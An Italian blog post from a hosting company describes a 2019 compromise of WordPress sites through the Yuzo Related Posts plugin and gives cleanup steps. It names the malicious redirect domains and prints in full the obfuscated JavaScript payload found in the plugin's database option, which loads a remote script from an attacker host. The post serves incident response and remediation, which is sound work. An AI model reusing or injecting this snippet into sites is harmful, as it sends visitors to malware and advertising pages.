Yuzo Related Posts Vulnerability and Exploit 0day in the wild. Vulnerabilità Yuzo Related Post Plugin Wordpress.

Circa un’ora fa, una pagina WordPress che gestiamo ha iniziato a reindirizzare a pagine di Advertising / Malware.

Ho trovato la fonte del reindirizzamento, desidero fornire assistenza agli altri interessati e ho bisogno di aiuto per trovare la vulnerabilità effettiva e / o una correzione.

Il reindirizzamento avviene dopo che il sito ha terminato il caricamento, quindi cercavo uno snippet di codice JavaScript nella pagina e reindirizzamenti dubbi nel Network Analyzer. I reindirizzamenti malevoli evidenti sono stati: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk.

Sono stato in grado di rintracciare i reindirizzamenti in arrivo da https://hellofromhony.org/counter che è incorporato tramite un frammento di codice.

Lo snippet era incorporato in wp_options in una voce con la chiave ‘yuzo_related_post_options’ – più specificamente incorporato nell’opzione json ‘yuzo_related_post_css_and_style’ del option_value.

Questa opzione fa parte del plugin dei post correlati di Yuzo, che è stato interrotto circa una settimana fa: https://wordpress.org/plugins/yuzo-related-post/

YUZO Related Posts vulnerabilità e fix

La rimozione di questo plugin ha interrotto immediatamente il reindirizzamento, non sono stato in grado di trovare altre tracce di manomissione del sito.

Nello specifico è bene seguire i seguenti passaggi per mettere al sicuro il proprio sito :

– Rimuovi / Disinstalla il plugin immediatamente.
– All’interno del tuo database vai alla wp_optionstabella e cerca il valore yuzo_related_post_optionscancella quel record.
– Non eliminare la tabella delle visite wp_yuzoviews, questo non influenza il problema.

Lo snippet che era nel option_value:

</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Durante la rimozione del plug-in viene visualizzato un quickfix, voglio approfondire ulteriormente per assicurarmi che non ci sia accesso al database, al backend e allo spazio web.

Se anche voi siete vittime di questo attacco e non siete in grado di risolvere questo problema in autonomia, chiedete pure il nostro aiuto tramite il servizio di Rimozione Malware e Virus WordPress.

Update a breve di Yuzo Related Posts

Come comunicato dall’autore del Plugin a breve verrà rilasciato un upgrade del plugin sebbene il plugin sia cessato esattamente qualche giorno fa a Marzo 2019. Non rimane che eseguire gli step sopra indicati e aspettare la nuova release.

Correlati

INFORMAZIONI

Managed Server S.r.l. è un player italiano di riferimento nel fornire soluzioni avanzate di sistemistica GNU/Linux orientate all’alta performance. Con un modello di sottoscrizione dai costi contenuti e prevedibili, ci assicuriamo che i nostri clienti abbiano accesso a tecnologie avanzate nel campo dell’hosting, server dedicati e servizi cloud. Oltre a questo, offriamo consulenza sistemistica su sistemi Linux e manutenzione specializzata in DBMS, IT Security, Cloud e molto altro. Ci distinguiamo per l’expertise in hosting di primari CMS Open Source come WordPress, WooCommerce, Drupal, Prestashop, Joomla, OpenCart e Magento, affiancato da un servizio di supporto e consulenza di alto livello adatto per la Pubblica Amministrazione, PMI, ed aziende di qualsiasi dimensione.

BLOG

Yuzo Related Posts Vulnerability and Exploit 0day in the wild. Vulnerabilità Yuzo Related Post Plugin WordPress.

Informazioni sull'autore

Marco Marcoaldi

Hai dei dubbi? Non sai da dove iniziare? Contattaci !

Chatta con noi

0256569681

Contattaci online

INFORMAZIONI

Soluzioni & Servizi

Assistenza Sistemistica

Help & Utility

Company

Pagamenti